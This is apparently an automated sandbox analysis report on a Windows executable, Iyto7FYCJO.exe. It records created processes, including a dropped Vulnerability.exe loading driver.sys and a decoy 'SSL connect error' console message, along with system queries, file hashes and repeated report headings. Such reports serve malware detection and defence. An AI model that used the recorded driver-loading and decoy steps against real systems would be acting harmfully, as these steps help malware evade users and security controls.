Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Vulnerability.exe

Code function: GetLocaleInfoEx,FormatMessageA,

5_2_00007FF7738F38A8

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F4D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00007FF7738F4D6C

ID:	1538236
Product:	CloudBasic
Start time:	21:14:08
Start date:	20.10.2024
Sample:	Iyto7FYCJO.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e12627a292cf6a7d32adb932adbd2b3b
SHA1:	2f6bf97cd38104937b7f47be38a00f0cea9a6f4a
SHA256:	eeca777e359e475f4bf1d137bd60dc0194e9520c0047a388ef28d383dc04250e
Filetype:	Win64 Executable Console (202006/5) 92.65%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys	PE32+ executable (native) x86-64, for MS Windows	D182377EF3BC7DA3AA3061676A457290	C4B3346CF950F220E1C399A82CDE169F4D14C9FB	D17E826A7694E368CCDA8BFAB9A3EFAE03CBAAE1D23EE620204EA1840ECC2242
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	PE32+ executable (console) x86-64, for MS Windows	8619AFEC8BD66B2C589FC987D7D0B194	095C0CC0F2B79CB1D8B8D6CFD453ACA3111C5DC6	4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
C:\Windows\Vulnerability.exe	PE32+ executable (console) x86-64, for MS Windows	8619AFEC8BD66B2C589FC987D7D0B194	095C0CC0F2B79CB1D8B8D6CFD453ACA3111C5DC6	4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
C:\Windows\driver.sys	PE32+ executable (native) x86-64, for MS Windows	D182377EF3BC7DA3AA3061676A457290	C4B3346CF950F220E1C399A82CDE169F4D14C9FB	D17E826A7694E368CCDA8BFAB9A3EFAE03CBAAE1D23EE620204EA1840ECC2242
\Device\ConDrv	ASCII text, with CRLF line terminators	3E3956EF4CCCBF8EB4A1135B76FF06BC	F8A348B224658CCE4BA781480C81F7790F7BB2D3	A8C95059B77DFC86C559982AECD282C7FA0012EA6E12D3A7D6AEAE89BBC0E3A8

Windows Analysis Report
Iyto7FYCJO.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report Iyto7FYCJO.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Iyto7FYCJO.exe